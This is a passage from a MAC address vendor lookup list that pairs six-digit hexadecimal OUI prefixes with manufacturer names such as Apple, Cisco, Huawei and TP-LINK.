Intel Corporate 000740 BUFFALO.INC 0024A5 BUFFALO.INC CCE1D5 BUFFALO.INC A402B9 Intel Corporate DC5360 Intel Corporate 001CC4 Hewlett Packard 001E0B Hewlett Packard 002264 Hewlett Packard 0025B3 Hewlett Packard 000CF1 Intel Corporation 784859 Hewlett Packard 58DC6D Exceptional Innovation, Inc. 902155 HTC Corporation 643150 Hewlett Packard 7CB15D HUAWEI TECHNOLOGIES CO.,LTD 00265E Hon Hai Precision Ind. Co.,Ltd. 00242C Hon Hai Precision Ind. Co.,Ltd. D8B377 HTC Corporation B0F1A3 Fengfan (BeiJing) Technology Co., Ltd. 3464A9 Hewlett Packard 3863BB Hewlett Packard 5CB901 Hewlett Packard DC4A3E Hewlett Packard B05ADA Hewlett Packard 001083 Hewlett Packard A0B3CC Hewlett Packard ECB1D7 Hewlett Packard 9CB654 Hewlett Packard 6C3BE5 Hewlett Packard B0AA36 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 784B87 Murata Manufacturing Co., Ltd. E4CE02 WyreStorm Technologies Ltd 40F308 Murata Manufacturing Co., Ltd. 808917 TP-LINK TECHNOLOGIES CO.,LTD. A09347 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E8BBA8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 942CB3 HUMAX Co., Ltd. 002719 TP-LINK TECHNOLOGIES CO.,LTD. 40169F TP-LINK TECHNOLOGIES CO.,LTD. F4EC38 TP-LINK TECHNOLOGIES CO.,LTD. 140467 SNK Technologies Co.,Ltd. 8030DC Texas Instruments A4D578 Texas Instruments 14CF92 TP-LINK TECHNOLOGIES CO.,LTD. 20DCE6 TP-LINK TECHNOLOGIES CO.,LTD. 14CC20 TP-LINK TECHNOLOGIES CO.,LTD. 246081 razberi technologies A4D18C Apple, Inc. 90F652 TP-LINK TECHNOLOGIES CO.,LTD. 241EEB Apple, Inc. CC25EF Apple, Inc. 88CF98 HUAWEI TECHNOLOGIES CO.,LTD F80D43 Hon Hai Precision Ind. Co.,Ltd. 38F889 HUAWEI TECHNOLOGIES CO.,LTD D07AB5 HUAWEI TECHNOLOGIES CO.,LTD 0019C6 zte corporation 001DD9 Hon Hai Precision Ind. Co.,Ltd. 00197D Hon Hai Precision Ind. Co.,Ltd. 7C4CA5 BSkyB Ltd 0014A4 Hon Hai Precision Ind. Co.,Ltd. 78DD08 Hon Hai Precision Ind. Co.,Ltd. 9CD21E Hon Hai Precision Ind. Co.,Ltd. B43052 HUAWEI TECHNOLOGIES CO.,LTD 80D09B HUAWEI TECHNOLOGIES CO.,LTD 1C8E5C HUAWEI TECHNOLOGIES CO.,LTD 84742A zte corporation 9CD24B zte corporation C87B5B zte corporation 0007D8 Hitron Technologies. Inc C03E0F BSkyB Ltd 904E2B HUAWEI TECHNOLOGIES CO.,LTD 2008ED HUAWEI TECHNOLOGIES CO.,LTD 0034FE HUAWEI TECHNOLOGIES CO.,LTD C85195 HUAWEI TECHNOLOGIES CO.,LTD 40CBA8 HUAWEI TECHNOLOGIES CO.,LTD D46E5C HUAWEI TECHNOLOGIES CO.,LTD 8853D4 HUAWEI TECHNOLOGIES CO.,LTD 04C06F HUAWEI TECHNOLOGIES CO.,LTD 202BC1 HUAWEI TECHNOLOGIES CO.,LTD 54A51B HUAWEI TECHNOLOGIES CO.,LTD 002568 HUAWEI TECHNOLOGIES CO.,LTD 781DBA HUAWEI TECHNOLOGIES CO.,LTD 00259E HUAWEI TECHNOLOGIES CO.,LTD 006B8E Shanghai Feixun Communication Co.,Ltd. D46AA8 HUAWEI TECHNOLOGIES CO.,LTD BCADAB Avaya Inc FCA841 Avaya Inc 3CB15B Avaya Inc 3475C7 Avaya Inc B0ADAA Avaya Inc B4475E Avaya Inc B8BC1B HUAWEI TECHNOLOGIES CO.,LTD 582AF7 HUAWEI TECHNOLOGIES CO.,LTD 24D921 Avaya Inc 848371 Avaya Inc 001B4F Avaya Inc 4C8BEF HUAWEI TECHNOLOGIES CO.,LTD 5006AB Cisco Systems, Inc FC48EF HUAWEI TECHNOLOGIES CO.,LTD 707BE8 HUAWEI TECHNOLOGIES CO.,LTD 4C1FCC HUAWEI TECHNOLOGIES CO.,LTD 00906D Cisco Systems, Inc 0090AB Cisco Systems, Inc 005054 Cisco Systems, Inc 00500B Cisco Systems, Inc 0003DD Comark Interactive Solutions 005053 Cisco Systems, Inc 005050 Cisco Systems, Inc D4B110 HUAWEI TECHNOLOGIES CO.,LTD E468A3 HUAWEI TECHNOLOGIES CO.,LTD 247189 Texas Instruments 987BF3 Texas Instruments A0F6FD Texas Instruments D0B5C2 Texas Instruments 78A504 Texas Instruments 6CECEB Texas Instruments 3400A3 HUAWEI TECHNOLOGIES CO.,LTD 00902B Cisco Systems, Inc 00E08F Cisco Systems, Inc 001868 Cisco SPVTG 887556 Cisco Systems, Inc FC9947 Cisco Systems, Inc 6C2056 Cisco Systems, Inc 0015F2 ASUSTek COMPUTER INC. 90E6BA ASUSTek COMPUTER INC. 002618 ASUSTek COMPUTER INC. F46D04 ASUSTek COMPUTER INC. 00E018 ASUSTek COMPUTER INC. 000C6E ASUSTek COMPUTER INC. 000EA6 ASUSTek COMPUTER INC. 001D60 ASUSTek COMPUTER INC. 6C416A Cisco Systems, Inc ECE1A9 Cisco Systems, Inc C067AF Cisco Systems, Inc ACF2C5 Cisco Systems, Inc 2401C7 Cisco Systems, Inc 6886A7 Cisco Systems, Inc C0255C Cisco Systems, Inc 3C0E23 Cisco Systems, Inc 08CC68 Cisco Systems, Inc 0C2724 Cisco Systems, Inc 6CFA89 Cisco Systems, Inc 00E0A3 Cisco Systems, Inc 602AD0 Cisco SPVTG 745E1C PIONEER CORPORATION 046273 Cisco Systems, Inc D8B190 Cisco Systems, Inc 80E86F Cisco Systems, Inc AC7E8A Cisco Systems, Inc 1CE85D Cisco Systems, Inc A89D21 Cisco Systems, Inc 689CE2 Cisco Systems, Inc 0023BE Cisco SPVTG 185933 Cisco SPVTG 445829 Cisco SPVTG F44E05 Cisco Systems, Inc 881DFC Cisco Systems, Inc 001011 Cisco Systems, Inc 00000C Cisco Systems, Inc 28CFE9 Apple, Inc. 00A040 Apple, Inc. A0F849 Cisco Systems, Inc 3CD0F8 Apple, Inc. 680927 Apple, Inc. 6CC26B Apple, Inc. 44D884 Apple, Inc. 002608 Apple, Inc. 0026B0 Apple, Inc. 0026BB Apple, Inc. D49A20 Apple, Inc. F81EDF Apple, Inc. C82A14 Apple, Inc. 3C0754 Apple, Inc. A4B197 Apple, Inc. F0B479 Apple, Inc. 1093E9 Apple, Inc. 442A60 Apple, Inc. A4D1D2 Apple, Inc. 28CFDA Apple, Inc. 003065 Apple, Inc. 001451 Apple, Inc. 001E52 Apple, Inc. 0021E9 Apple, Inc. CC08E0 Apple, Inc. 045453 Apple, Inc. F4F951 Apple, Inc. C06394 Apple, Inc. 18AF8F Apple, Inc. C8B5B7 Apple, Inc. 90B21F Apple, Inc. 30F7C5 Apple, Inc. 40B395 Apple, Inc. 44FB42 Apple, Inc. E88D28 Apple, Inc. 949426 Apple, Inc. 207D74 Apple, Inc. F4F15A Apple, Inc. C86F1D Apple, Inc. 3090AB Apple, Inc. 8C2DAA Apple, Inc. 848506 Apple, Inc. 98FE94 Apple, Inc. D8004D Apple, Inc. 64200C Apple, Inc. C8334B Apple, Inc. 64E682 Apple, Inc. B8E856 Apple, Inc. D89695 Apple, Inc. 1499E2 Apple, Inc. B418D1 Apple, Inc. 9C207B Apple, Inc. B065BD Apple, Inc. 542696 Apple, Inc. 64A3CB Apple, Inc. 903C92 Apple, Inc. D81D72 Apple, Inc. 341298 Apple, Inc. 70E72C Apple, Inc. 70ECE4 Apple, Inc. 68AE20 Apple, Inc. AC87A3 Apple, Inc. D8BB2C Apple, Inc. D04F7E Apple, Inc. 2078F0 Apple, Inc. E0ACCB Apple, Inc. A0999B Apple, Inc. 24240E Apple, Inc. F0DBF8 Apple, Inc. 48746E Apple, Inc. 54AE27 Apple, Inc. FCE998 Apple, Inc. 0CBC9F Apple, Inc. 34363B Apple, Inc. D0A637 Apple, Inc. 789F70 Apple, Inc. 9CF387 Apple, Inc. A85B78 Apple, Inc. C8F650 Apple, Inc. A88E24 Apple, Inc. 6C4A39 BITA 847D50 Holley Metering Limited 50D59C Thai Habel Industrial Co., Ltd. 20896F Fiberhome Telecommunication Technologies Co.,LTD 3052CB Liteon Technology Corporation 049645 WUXI SKY CHIP INTERCONNECTION TECHNOLOGY CO.,LTD. 1CCDE5 Shanghai Wind Technologies Co.,Ltd 681401 Hon Hai Precision Ind. Co.,Ltd. 50A9DE Smartcom - Bulgaria AD AC1FD7 Real Vision Technology Co.,Ltd. 88C242 Poynt Co. 1402EC Hewlett Packard Enterprise E034E4 Feit Electric Company, Inc. 34C9F0 LM Technologies Ltd 68A828 HUAWEI TECHNOLOGIES CO.,LTD CC20E8 Apple, Inc. 48BF74 Baicells Technologies Co.,LTD 6C9354 Yaojin Technology (Shenzhen) Co., LTD. DCDC07 TRP Systems BV 3891D5 Hangzhou H3C Technologies Co., Limited 8CE2DA Circle Media Inc 382187 Midea Group Co., Ltd. 78D6B2 Toshiba E8DED6 Intrising Networks, Inc. DC82F6 iPort 70480F Apple, Inc. 3CB72B PLUMgrid Inc 489A42 Technomate Ltd 20D160 Private BC9C31 HUAWEI TECHNOLOGIES CO.,LTD D88B4C KingTing Tech. 384C90 ARRIS Group, Inc. F0B0E7 Apple, Inc. 381C23 Hilan Technology CO.,LTD 649A12 P2 Mobile Technologies Limited AC8995 AzureWave Technology Inc. 0469F8 Apple, Inc. 3029BE Shanghai MRDcom Co.,Ltd 20C3A4 RetailNext E4C2D1 HUAWEI TECHNOLOGIES CO.,LTD D4F4BE Palo Alto Networks 48B620 ROLI Ltd. D888CE RF Technology Pty Ltd 307CB2 ANOV FRANCE 847973 Shanghai Baud Data Communication Co.,Ltd. E8B4C8 Samsung Electronics Co.,Ltd D087E2 Samsung Electronics Co.,Ltd F05B7B Samsung Electronics Co.,Ltd B047BF Samsung Electronics Co.,Ltd 7C0BC6 Samsung Electronics Co.,Ltd 7CFE90 Mellanox Technologies, Inc. 845B12 HUAWEI TECHNOLOGIES CO.,LTD 205531 Samsung Electronics Co.,Ltd 10868C ARRIS Group, Inc. 44FDA3 Everysight LTD. A8A795 Hon Hai Precision Ind. Co.,Ltd. 906FA9 NANJING PUTIAN TELECOMMUNICATIONS TECHNOLOGY CO.,LTD. 60FD56 WOORISYSTEMS CO., Ltd 9870E8 INNATECH SDN BHD 44656A Mega Video Electronic(HK) Industry Co., Ltd 78EB39 Instituto Nacional de Tecnología Industrial 0C756C Anaren Microwave, Inc. D47BB0 ASKEY COMPUTER CORP F0224E Esan electronic co. CC5FBF Topwise 3G Communication Co., Ltd. C8F9C8 NewSharp Technology(SuZhou)Co,Ltd 80C5E6 Microsoft Corporation 10DF8B Shenzhen CareDear Communication Technology Co.,Ltd C412F5 D-Link International 5C4527 Juniper Networks E02CB2 Lenovo Mobile Communication (Wuhan) Company Limited 606DC7 Hon Hai Precision Ind. Co.,Ltd. 68EDA4 Shenzhen Seavo Technology Co.,Ltd 2CC5D3 Ruckus Wireless F4573E Fiberhome Telecommunication Technologies Co.,LTD D0431E Dell Inc. 54CD10 Panasonic Mobile Communications Co.,Ltd. 408D5C GIGA-BYTE TECHNOLOGY CO.,LTD. FCE1FB Array Networks E89120 Motorola Mobility LLC, a Lenovo Company D4F9A1 HUAWEI TECHNOLOGIES CO.,LTD 5440AD Samsung Electronics Co.,Ltd A424DD Cambrionix Ltd 145A83 Logi-D inc 804E81 Samsung Electronics Co.,Ltd C09A71 XIAMEN MEITU MOBILE TECHNOLOGY CO.LTD 64167F Polycom 340B40 MIOS ELETTRONICA SRL 48066A Tempered Networks, Inc. BCF811 Xiamen DNAKE Technology Co.,Ltd 900A39 Wiio, Inc. D0C0BF Actions Microelectronics Co., Ltd E861BE Melec Inc. 5870C6 Shanghai Xiaoyi Technology Co., Ltd. FC8F90 Samsung Electronics Co.,Ltd 74042B Lenovo Mobile Communication (Wuhan) Company Limited F87AEF Rosonix Technology, Inc. 2028BC Visionscape Co,. Ltd. 241C04 SHENZHEN JEHE TECHNOLOGY DEVELOPMENT CO., LTD. D05C7A Sartura d.o.o. 887033 Hangzhou Silan Microelectronic Inc DC56E6 Shenzhen Bococom Technology Co.,LTD CC9635 LVS Co.,Ltd. 4480EB Motorola Mobility LLC, a Lenovo Company 402814 RFI Engineering 144146 Honeywell (China) Co., LTD 94F19E HUIZHOU MAORONG INTELLIGENT TECHNOLOGY CO.,LTD B856BD ITT LLC 40A5EF Shenzhen Four Seas Global Link Network Technology Co., Ltd. C4924C KEISOKUKI CENTER CO.,LTD. 749CE3 KodaCloud Canada, Inc D45556 Fiber Mountain Inc. 50502A Egardia 749637 Todaair Electronic Co., Ltd 88E603 Avotek corporation 2CAD13 SHENZHEN ZHILU TECHNOLOGY CO.,LTD 78ACBF Igneous Systems C48E8F Hon Hai Precision Ind. Co.,Ltd. C4366C LG Innotek 54369B 1Verge Internet Technology (Beijing) Co., Ltd. 40D28A Nintendo Co., Ltd. 4062B6 Tele system communication 60128B CANON INC. 84C3E8 Vaillant GmbH 9CD35B Samsung Electronics Co.,Ltd A89FBA Samsung Electronics Co.,Ltd B88EC6 Stateless Networks BCD165 Cisco SPVTG 28E476 Pi-Coral 4CA515 Baikal Electronics JSC 7C3CB6 Shenzhen Homecare Technology Co.,Ltd. 1C7D22 Fuji Xerox Co., Ltd. 20C06D SHENZHEN SPACETEK TECHNOLOGY CO.,LTD 4886E8 Microsoft Corporation 74A34A ZIMI CORPORATION A86405 nimbus 9, Inc 30D587 Samsung Electronics Co.,Ltd 6828F6 Vubiq Networks, Inc. DC60A1 Teledyne DALSA Professional Imaging 10A659 Mobile Create Co.,Ltd. 58856E QSC AG 8C9109 Toyoshima Electric Technoeogy(Suzhou) Co.,Ltd. 54098D deister electronic GmbH D05BA8 zte corporation E4BAD9 360 Fly Inc. EC59E7 Microsoft Corporation C035C5 Prosoft Systems LTD A0A3E2 Actiontec Electronics, Inc 74547D Cisco SPVTG 00E6E8 Netzin Technology Corporation,.Ltd. 50F43C Leeo Inc E887A3 Loxley Public Company Limited 10C67E SHENZHEN JUCHIN TECHNOLOGY CO., LTD 08A5C8 Sunnovo International Limited F88479 Yaojin Technology(Shenzhen)Co.,Ltd 2C2997 Microsoft Corporation D46132 Pro Concept Manufacturer Co.,Ltd. 54A050 ASUSTek COMPUTER INC. 4C2C83 Zhejiang KaNong Network Technology Co.,Ltd. 908C09 Total Phase DC2F03 Step forward Group Co., Ltd. 380E7B V.P.S. Thai Co., Ltd 2C3796 CYBO CO.,LTD. 587FB7 SONAR INDUSTRIAL CO., LTD. 08EB29 Jiangsu Huitong Group Co.,Ltd. 409B0D Shenzhen Yourf Kwan Industrial Co., Ltd D8CB8A Micro-Star INTL CO., LTD. 70FC8C OneAccess SA 58108C Intelbras 4C7403 BQ 8C5D60 UCI Corporation Co.,Ltd. BC6B4D Nokia C8D019 Shanghai Tigercel Communication Technology Co.,Ltd 902181 Shanghai Huaqin Telecom Technology Co.,Ltd 849681 Cathay Communication Co.,Ltd 2CA30E POWER DRAGON DEVELOPMENT LIMITED 8486F3 Greenvity Communications 1C5216 DONGGUAN HELE ELECTRONICS CO., LTD 6099D1 Vuzix / Lenovo B04515 mira fitness,LLC. 14488B Shenzhen Doov Technology Co.,Ltd 2012D5 Scientech Materials Corporation 6C6EFE Core Logic Inc. 3808FD Silca Spa 784561 CyberTAN Technology Inc. 94CE31 CTS Limited 80F8EB RayTight D437D7 zte corporation 2C010B NASCENT Technology, LLC - RemKon 04DEDB Rockport Networks Inc 1C4840 IMS Messsysteme GmbH 6050C1 Kinetek Sports 2C1A31 Electronics Company Limited 90B686 Murata Manufacturing Co., Ltd. ECD9D1 Shenzhen TG-NET Botone Technology Co.,Ltd. 6C0273 Shenzhen Jin Yun Video Equipment Co., Ltd. 54DF00 Ulterius Technologies, LLC 20ED74 Ability enterprise co.,Ltd. A056B2 Harman/Becker Automotive Systems GmbH 44666E IP-LINE 244F1D iRule LLC 94AEE3 Belden Hirschmann Industries (Suzhou) Ltd. 5CB6CC NovaComm Technologies Inc. 705B2E M2Communication Inc. 5C1515 ADVAN D059E4 Samsung Electronics Co.,Ltd 14A364 Samsung Electronics Co.,Ltd B40AC6 DEXON Systems Ltd. D866EE BOXIN COMMUNICATION CO.,LTD. 2829CC Corsa Technology Incorporated 184A6F Alcatel-Lucent Shanghai Bell Co., Ltd 10C37B ASUSTek COMPUTER INC. E85D6B Luminate Wireless B40B44 Smartisan Technology Co., Ltd. 3431C4 AVM GmbH 50FEF2 Sify Technologies Ltd 34C5D0 Hagleitner Hygiene International GmbH A012DB TABUCHI ELECTRIC CO.,LTD 481A84 Pointer Telocation Ltd DC663A Apacer Technology Inc. 08DF1F Bose Corporation 581F67 Open-m technology limited 4826E8 Tek-Air Systems, Inc. D05AF1 Shenzhen Pulier Tech CO.,Ltd FCE186 A3M Co., LTD 54EF92 Shenzhen Elink Technology Co., LTD ECE512 tado GmbH 30918F Technicolor 5CF4AB Zyxel Communications Corporation 08B2A3 Cynny Italia S.r.L. 70305D Ubiquoss Inc 488244 Life Fitness / Div. of Brunswick C83168 eZEX corporation 40B3CD Chiyoda Electronics Co.,Ltd. 24336C Private 202564 PEGATRON CORPORATION C8D590 FLIGHT DATA SYSTEMS 7CFF62 Huizhou Super Electron Technology Co.,Ltd. 84B59C Juniper Networks C09D26 Topicon HK Lmd. 442938 NietZsche enterprise Co.Ltd. A0DA92 Nanjing Glarun Atten Technology Co. Ltd. ECF72B HD DIGITAL TECH CO., LTD. 4CF45B Blue Clover Devices B06971 DEI Sales, Inc. 1889DF CerebrEX Inc. 54C80F TP-LINK TECHNOLOGIES CO.,LTD. E4D332 TP-LINK TECHNOLOGIES CO.,LTD. 0C2026 noax Technologies AG 283B96 Cool Control LTD 648D9E IVT Electronic Co.,Ltd CC95D7 Vizio, Inc FC09F6 GUANGDONG TONZE ELECTRIC CO.,LTD BCF61C Geomodeling Wuxi Technology Co. Ltd. FC923B Nokia Corporation E03F49 ASUSTek COMPUTER INC. 88A73C Ragentek Technology Group 88D962 Canopus Systems US LLC D09C30 Foster Electric Company, Limited 949F3F Optek Digital Technology company limited E817FC Fujitsu Cloud Technologies Limited 78FEE2 Shanghai Diveo Technology Co., Ltd 086DF2 Shenzhen MIMOWAVE Technology Co.,Ltd 687848 Westunitis Co., Ltd. 48D0CF Universal Electronics, Inc. 9C3EAA EnvyLogic Co.,Ltd. 1CFCBB Realfiction ApS F8F005 Newport Media Inc. 28656B Keystone Microtech Corporation CC9F35 Transbit Sp. z o.o. DCC793 Nokia Corporation 444891 HDMI Licensing, LLC 5C254C Avire Global Pte Ltd D42F23 Akenori PTE Ltd 98C0EB Global Regency Ltd F03FF8 R L Drake B0C554 D-Link International 48EE86 UTStarcom (China) Co.,Ltd 888914 All Components Incorporated F0321A Mita-Teknik A/S A881F1 BMEYE B.V. C4E984 TP-LINK TECHNOLOGIES CO.,LTD. D069D0 Verto Medical Solutions, LLC FC1349 Global Apps Corp. 848433 Paradox Engineering SA 44C306 SIFROM Inc. 602103 I4VINE, INC FC07A0 LRE Medical GmbH 1CEEE8 Ilshin Elecom 9031CD Onyx Healthcare Inc. E48184 Nokia 14C089 DUNE HD LTD F4B6E5 TerraSem Co.,Ltd 60FFDD C.E. ELECTRONICS, INC 24050F MTN Electronic Co. Ltd AC2DA3 TXTR GmbH 889CA6 BTB Korea INC 90837A General Electric Water & Process Technologies 80BAE6 Neets F8A2B4 RHEWA-WAAGENFABRIK August Freudewald GmbH &Co. KG E056F4 AxesNetwork Solutions inc. 84569C Coho Data, Inc., 78AE0C Far South Networks B024F3 Progeny Systems 0C54A5 PEGATRON CORPORATION 8C4DB9 Unmonday Ltd 78CA5E ELNO 2C5A05 Nokia Corporation D481CA iDevices, LLC D858D7 CZ.NIC, z.s.p.o. B0D7C5 Logipix Ltd A43A69 Vers Inc 9C44A6 SwiftTest, Inc. 4CD9C4 Magneti Marelli Automotive Electronics (Guangzhou) Co. Ltd 50E0C7 TurControlSystme AG B4827B AKG Acoustics GmbH DC5E36 Paterson Technology DCAD9E GreenPriz B8DF6B SpotCam Co., Ltd. 9C8888 Simac Techniek NV 10B26B base Co.,Ltd. 4CF02E Vifa Denmark A/S 288A1C Juniper Networks DCCEBC Shenzhen JSR Technology Co.,Ltd. 18C8E7 Shenzhen Hualistone Technology Co.,Ltd A03B1B Inspire Tech 7CCD3C Guangzhou Juzing Technology Co., Ltd 9843DA INTERTECH 08CA45 Toyou Feiji Electronics Co., Ltd. 3CCA87 Iders Incorporated 7C6AB3 IBC TECHNOLOGIES INC. 181BEB Actiontec Electronics, Inc 84A783 Alcatel Lucent 041A04 WaveIP 68764F Sony Mobile Communications Inc 34A5E1 Sensorist ApS 8079AE ShanDong TecsunriseCo.,Ltd 7CBD06 AE REFUsol 94BA56 Shenzhen Coship Electronics Co., Ltd. 38DBBB Sunbow Telecom Co., Ltd. 448A5B Micro-Star INT'L CO., LTD. 6C4B7F Vossloh-Schwabe Deutschland GmbH 908C44 H.K ZONGMU TECHNOLOGY CO., LTD. 688AB5 EDP Servicos 2493CA Voxtronic Austria 0CCB8D ASCO Numatics GmbH 907990 Benchmark Electronics Romania SRL 740EDB Optowiz Co., Ltd 6C8366 Nanjing SAC Power Grid Automation Co., Ltd. F83D4E Softlink Automation System Co., Ltd 74D435 GIGA-BYTE TECHNOLOGY CO.,LTD. 78D99F NuCom HK Ltd. 142BD2 Armtel Ltd. 9CA10A SCLE SFE 88789C Game Technologies SA A4895B ARK INFOSOLUTIONS PVT LTD D09D0A LINKCOM EC219F VidaBox LLC A8CCC5 Saab AB (publ) 58468F Koncar Electronics and Informatics 985D46 PeopleNet Communication F89FB8 YAZAKI Energy System Corporation F0F5AE Adaptrum Inc. FC3FAB Henan Lanxin Technology Co., Ltd 988E4A NOXUS(BEIJING) TECHNOLOGY CO.,LTD EC2AF0 Ypsomed AG F854AF ECI Telecom Ltd. 54BEF7 PEGATRON CORPORATION 50B888 wi2be Tecnologia S/A 7C8306 Glen Dimplex Nordic as 442AFF E3 Technology, Inc. 140D4F Flextronics International 446755 Orbit Irrigation E0FAEC Platan sp. z o.o. sp. k. 7CE56B ESEN Optoelectronics Technology Co.,Ltd. D44C9C Shenzhen YOOBAO Technology Co.Ltd 20CEC4 Peraso Technologies CC4703 Intercon Systems Co., Ltd. ACCA8E ODA Technologies 088E4F SF Software Solutions 540536 Vivago Oy 6C90B1 SanLogic Inc CC7B35 zte corporation 04D437 ZNV CCF407 EUKREA ELECTROMATIQUE SARL DC1792 Captivate Network 28A241 exlar corp 509871 Inventum Technologies Private Limited 048C03 ThinPAD Technology (Shenzhen)CO.,LTD 88462A Telechips Inc. C80258 ITW GSE ApS 30786B TIANJIN Golden Pentagon Electronics Co., Ltd. 20DF3F Nanjing SAC Power Grid Automation Co., Ltd. F8516D Denwa Technology Corp. 444A65 Silverflare Ltd. 744BE9 EXPLORER HYPERTECH CO.,LTD FC6018 Zhejiang Kangtai Electric Co., Ltd. F42012 Cuciniale GmbH 98B039 Nokia B830A8 Road-Track Telematics Development 4CD637 Qsono Electronics Co., Ltd 9436E0 Sichuan Bihong Broadcast & Television New Technologies Co.,Ltd 5422F8 zte corporation 486E73 Pica8, Inc. 6405BE NEW LIGHT LED 646EEA Iskratel d.o.o. D0737F Mini-Circuits E8BB3D Sino Prime-Tech Limited 28285D Zyxel Communications Corporation 0CF019 Malgn Technology Co., Ltd. 949FB4 ChengDu JiaFaAnTai Technology Co.,Ltd 406826 Thales UK Limited F82BC8 Jiangsu Switter Co., Ltd 60C397 2Wire Inc E07F88 EVIDENCE Network SIA 1C7CC7 Coriant GmbH 341B22 Grandbeing Technology Co., Ltd 40560C In Home Displays Ltd 58E02C Micro Technic A/S 78B3CE Elo touch solutions 88142B Protonic Holland A4FCCE Security Expert Ltd. 34A68C Shine Profit Development Limited 341A4C SHENZHEN WEIBU ELECTRONICS CO.,LTD. 0488E2 Beats Electronics LLC A47ACF VIBICOM COMMUNICATIONS INC. BC261D HONG KONG TECON TECHNOLOGY E8CE06 SkyHawke Technologies, LLC. C8F386 Shenzhen Xiaoniao Technology Co.,Ltd E0DCA0 Siemens Industrial Automation Products Ltd Chengdu 842F75 Innokas Group CC3C3F SA.S.S. Datentechnik AG 2C69BA RF Controls, LLC D4BF7F UPVEL 2C72C3 Soundmatters C44838 Satcom Direct, Inc. C8DDC9 Lenovo Mobile Communication Technology Ltd. 6C8686 Technonia D4AC4E BODi rS, LLC 204C6D Hugo Brennenstuhl Gmbh & Co. KG. 40C4D6 ChongQing Camyu Technology Development Co.,Ltd. A8294C Precision Optical Transceivers, Inc. 70C6AC Bosch Automotive Aftermarket 7C0507 PEGATRON CORPORATION 880905 MTMCommunications 30D46A Autosales Incorporated 282CB2 TP-LINK TECHNOLOGIES CO.,LTD. 64E599 EFM Networks 308999 Guangdong East Power Co., C89346 MXCHIP Company Limited F4B381 WindowMaster A/S 74F102 Beijing HCHCOM Technology Co., Ltd A0861D Chengdu Fuhuaxin Technology co.,Ltd 508D6F CHAHOO Limited E8DE27 TP-LINK TECHNOLOGIES CO.,LTD. 94ACCA trivum technologies GmbH 9C9726 Technicolor 908260 IEEE 1904.1 Working Group D4EE07 HIWIFI Co., Ltd. FCAD0F QTS NETWORKS 984C04 Zhangzhou Keneng Electrical Equipment Co Ltd A4E991 SISTEMAS AUDIOVISUALES ITELSIS S.L. 3C86A8 Sangshin elecom .co,, LTD 84F493 OMS spol. s.r.o. BCD177 TP-LINK TECHNOLOGIES CO.,LTD. ACDBDA Shenzhen Geniatech Inc, Ltd D42751 Infopia Co., Ltd 103DEA HFC Technology (Beijing) Ltd. Co. F05DC8 Duracell Powermat CC5D57 InformationSystem Research Institute,Inc. 64C667 Barnes&Noble F0F260 Mobitec AB 044CEF Fujian Sanao Technology Co.,Ltd 4C804F Armstrong Monitoring Corp 7CD762 Freestyle Technology Pty Ltd 901D27 zte corporation 9C3178 Foshan Huadian Intelligent Communications Teachnologies Co.,Ltd B0C95B Beijing Symtech CO.,LTD 4CCA53 Skyera, Inc. 90FF79 Metro Ethernet Forum B01408 LIGHTSPEED INTERNATIONAL CO. 081DFB Shanghai Mexon Communication Technology Co.,Ltd 983F9F China SSJ (Suzhou) Network Technology Inc. B838CA Kyokko Tsushin System CO.,LTD C44EAC Shenzhen Shiningworth Technology Co., Ltd. A80180 IMAGO Technologies GmbH 0C5521 Axiros GmbH 68A40E BSH Hausgeräte GmbH F4C6D7 blackned GmbH D4CA6E u-blox AG 5C43D2 HAZEMEYER D809C3 Cercacor Labs E0C2B7 Masimo Corporation A01917 Bertel S.p.a. 68B8D9 Act KDE, Inc. 90CC24 Synaptics, Inc 2CE871 Alert Metalguard ApS F87B62 FASTWEL INTERNATIONAL CO., LTD. Taiwan Branch 40270B Mobileeco Co., Ltd 74FE48 ADVANTECH CO., LTD. 80B95C ELFTECH Co., Ltd. 38B5BD E.G.O. Elektro-Ger 20918A PROFALUX E4EEFD MR&D Manufacturing 105CBF DuroByte Inc A46E79 DFT System Co.Ltd C88A83 Dongguan HuaHong Electronics Co.,Ltd 8CC5E1 ShenZhen Konka Telecommunication Technology Co.,Ltd 64A341 Wonderlan (Beijing) Technology Co., Ltd. 7898FD Q9 Networks Inc. D063B4 SolidRun Ltd. 9C541C Shenzhen My-power Technology Co.,Ltd 8C3330 EmFirst Co., Ltd. 087BAA SVYAZKOMPLEKTSERVICE, LLC 24F2DD Radiant Zemax LLC 20B5C6 Mimosa Networks E4E409 LEIFHEIT AG B877C3 METER Group 004D32 Andon Health Co.,Ltd. FCA9B0 MIARTECH (SHANGHAI),INC. 94DE80 GIGA-BYTE TECHNOLOGY CO.,LTD. 2C441B Spectrum Medical Limited EC4993 Qihan Technology Co., Ltd B0ACFA FUJITSU LIMITED 8CE081 zte corporation A44E2D Adaptive Wireless Solutions, LLC 0CCDFB EDIC Systems Inc. 9C8D1A INTEG process group inc 480362 DESAY ELECTRONICS(HUIZHOU)CO.,LTD 18673F Hanover Displays Limited 7C0A50 J-MEX Inc. 5011EB SilverNet Ltd 54DF63 Intrakey technologies GmbH 40F2E9 IBM 744D79 Arrive Systems Inc. 9C0473 Tecmobile (International) Ltd. B4DFFA Litemax Electronics Inc. 681CA2 Rosewill Inc. 604616 XIAMEN VANN INTELLIGENT CO., LTD E45614 Suttle Apparatus 3C83B5 Advance Vision Electronics Co. Ltd. 28A192 GERP Solution 106FEF Ad-Sol Nissin Corp 6C40C6 Nimbus Data, Inc. 1048B1 Beijing Duokan Technology Limited D493A0 Fidelix Oy 08EBED World Elite Technology Co.,LTD DC9FA4 Nokia Corporation 44C39B OOO RUBEZH NPO C44567 SAMBON PRECISON and ELECTRONICS 48F8B3 Cisco-Linksys, LLC D8D27C JEMA ENERGY, SA B01203 Dynamics Hong Kong Limited 9886B1 Flyaudio corporation (China) 7093F8 Space Monkey, Inc. 28B3AB Genmark Automation C4E7BE SCSpro Co.,Ltd 58874C LITE-ON CLEAN ENERGY TECHNOLOGY CORP. 2891D0 Stage Tec Entwicklungsgesellschaft für professionelle Audiotechnik mbH C0BD42 ZPA Smart Energy a.s. FC52CE Control iD 5C4A26 Enguity Technology Corp 60F2EF VisionVera International Co., Ltd. C03F2A Biscotti, Inc. 381C4A SIMCom Wireless Solutions Co.,Ltd. D8C691 Hichan Technology Corp. E43FA2 Wuxi DSP Technologies Inc. F4B72A TIME INTERCONNECT LTD 749975 IBM Corporation 2C625A Finest Security Systems Co., Ltd 2074CF 